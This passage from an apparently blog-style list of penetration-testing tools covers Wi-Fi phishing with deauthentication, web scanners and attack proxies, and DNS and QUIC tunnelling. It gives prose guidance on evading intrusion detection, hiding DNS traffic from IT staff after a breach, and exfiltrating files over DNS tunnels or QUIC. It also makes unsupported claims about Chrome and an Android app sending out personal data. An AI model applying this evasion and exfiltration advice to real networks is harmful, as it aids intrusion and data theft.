You will need some sort of key or credential from your Infrastructure-as-a-Service provider of choice, for example, Amazon IAM User Keys. Just follow the README.md to figure out what credentials you need to setup.
20. Wi-Fi Phisher
The developer of Wi-Fi Phisher took a different approach in hacking WPA2-PSK router setups. Instead of capturing the encrypted handshake and spending additional time cracking it, why not just trick the owner of the router into handing over the password via social engineering?
Wi-Fi Phisher generates a rogue hotspot, much like mana-toolkit, but then enumerates the original targeted router, and generates convincing router login logo pages to better convince the victim.
Meanwhile, a second optional wireless pentesting antenna is used to repeatedly deauth (“kick”) the victim router’s clients until they are forced to join your rogue hotspot, by which they are immediately redirected to a captive portal posing as their router login page.
21. Subgraph Vega, Arachni, Nikto, OWASP Zaproxy
All four of these scanners and proxies are essential to attacking remote web applications. Both Vega and Arachni are particularly keen in detecting Cross-Site-Scripting Vulnerabilities, SQL Injection opportunities, and other injection flaws.
Arachni in particularly, has multiple tools to re-test and re-validate the existence of a injection vulnerability after the results of the original scan have been collected.
Nikto is a standard go-to webserver auditor that can point to additional clues on any misconfigurations and vulnerabilities that a suspect webserver may have.
If all else fails, often the OWASP Zaproxy can catch the flaw before you miss it.
22. Spikeproxy and mitmproxy
Spikeproxy and mitmproxy fill the category on what are known as “attack-proxies”. As you browse the webpage with the traffic routed through the port of the proxy, the proxy itself is continually scanning and auditing each web content for flaws. Spikeproxy is primarily automatic and has some rudimentary auditing and web domain crawling skills.
Another honorable mention that showed up in the Kali repository is ProxyStrike, which appears to be a combination of spikeproxy and mitmproxy.
BurpSuite is known as a “intercept-proxy”, and is a major improvement on top of the text-based attack-proxies that I have mentioned before. By default, BurpSuite will intercept each frame of web traffic before asking you to continue to forward the data to the intended destination.
At any time, you can edit the HTTP GET or POST request before forwarding it, or alter parameters to see if you can elicit a more favorable response from a webserver (like bypassing a login page). Previous HTTP requests and responses can be reviewed, and also URL encoding can be analyzed to look for features such as ‘==’ statements to identify logic-checks. If all I had to do is turn ‘==False’ into ‘==True’, that may be all that I need to bypass the Administrator login page and seize the web application.
BurpSuite is frequently updated by it’s parent company, PortSwigger, and also features neat interactions with other penetration testing suites, including but not limited to, a automatic SQL Injection module to be run in conjunction with SQLMap. As you browse a web page, the SQLMap Java module will automatically audit and attempt to inject SQL statements throughout the webserver.
TinyProxy is unique in that the proxy’s function is entirely reversible. It can handle traffic going forward like a ordinary proxy, or be the receiving end of requests such as HTTP requests.
This versatility can be set in the configuration file: /etc/tinyproxy/tinyproxy.conf
Meanwhile, specific settings allow TinyProxy to be more “discriminating” in certain tasks, such as fine-tuning DNS-redirection being performed by DNSMasq and DNSChef. A upstream proxy can be permitted for allowed domains, letting the request pass, while a no-upstream setting can be used to lock down certain domain name queries.
Furthermore, TinyProxy can be configured to listen only to certain hosts and ignore others, or to match entire specific subnet ranges, as well as adding/removing special headers in each processed HTTP request.
This app should be regularly run as a service on the attacker machine (laptop). Instead of allowing DNS queries to simply pass through cleartext, when properly configured, DNSCrypt-Proxy will proxy your DNS Query to up to 145 unique different encrypted resolvers around the world.
This helps leave a lower footprint when a breach has been formed and prevent your DNS queries from being readable by snooping IT staff.
Combining this with a DNS-Tunnel formed by Iodine or DNSCat for maximum effect in smuggling exfiltrated critical files.
26 . The Golang QUIC Socket and The Docker QUIC Socket Container
Google’s QUIC transport has been making quite a splash in the cybersecurity industry. Mainly because modern Intrusion Detection Systems, Intrusion Prevention Systems, and IDPS’s have consistently failed to flag obvious malware traffic transmitted through the transport.
Why? Because the technology is simply too new. The farthest wireshark has ever gotten into dissecting the packet was identifying the QUIC packet and separating the obvious headers as dictated by IETF specifications https://datatracker.ietf.org/doc/draft-ietf-quic-transport/, but other than that, you need to read the IETF proposals in detail to understanding the meaning of the flags being set to 0 or 1
This makes it a ideal tool for a pentester. It is also…
- Amazingly fast thanks to it’s UDP datagram multiplexing design
- It has very tight controls for initiating and terminating QUIC sessions, including uniquely identifying each stream with a ID by default, having a set Stream State, precise Flow Control, and generating Concurrent Streams
- It can sneak past firewalls, IPS’s, IDS’s, and IDPS’s
- There is also a option to initiate a “generic” unlabeled QUIC session stream
- A lot of the features proposed in the QUIC standard is meant to bring UDP in-line with TCP’s session-oriented connections.
- It is also, obviously, capable of transmitting raw binary data
- It comes in several session flavors, you can have Classic QUIC, QUIC with TLS, or you can have QUIC with HTTP/2.0 and TLS.
- For encrypted TLS connections, the QUIC protocol enhances forward-secrecy during the key exchange by using special flags set in the frames to signal the commencement of the handshake
In my personal cybersecurity career, I came across a suspicious Android app called httpcanary that purportedly is a pentesting tool that sniffs for HTTP requests. While it did it’s job well, it did it so freaking well that it revealed to me that it was exporting my personal information and my Android phone’s state and relative location to a Chinese webserver in the format of a XML file. All of this was being sent, via a QUIC socket.
Also Google Chrome for both Desktop and Android secretly forwards your personal information to their servers, using the QUIC socket. But you can disable the usage of QUIC in the advanced settings.
So how do you enjoy the magical, awesome benefits, of Google QUIC?!?
You have two options, albeit popularity in Golang is rapidly increasing. Even the author of the Mirai botnet managed his victims using a Command-and-Control Server written in Go.
Option #1: QUIC Golang Client-Server
If you are willing to learn a bit of a new language, you should pick Golang and have a whack at this QUIC Golang library. I will assure you that you will not miss this opportunity. A example QUIC server and a example QUIC client has already been provided in the repo.
Option #2: Docker QUIC Reverse Proxy Server (Golang)
Now we have a QUIC reverse-proxy server setup on our remotely located Virtual Private Server, and we are deep within enemy lines and in great need to exfiltrate some critical files…
Do you know where I am getting at? >:)
Try using the Golang Client from the first repo, and send a payload containing a critical pdf file over to your reverse proxy on the remote listener address and see if it thumbs up the exfiltration. Keep a packet capture running to see if you can discern any faults with the implementation of QUIC-TLS or if you can find a DNS leak or a origin IP.
Option #3: Proprietary LiteSpeed Servers
Alternatively, and not one that I recommend just to do exfil, is that you can simply rent a webserver much like how you would rent a Amazon AWS EC2 or Lightsail instance, but this time, it can process QUIC transactions.
Currently LiteSpeed supports QUIC, QUIC-TLS, and QUIC-HTTPS out of the box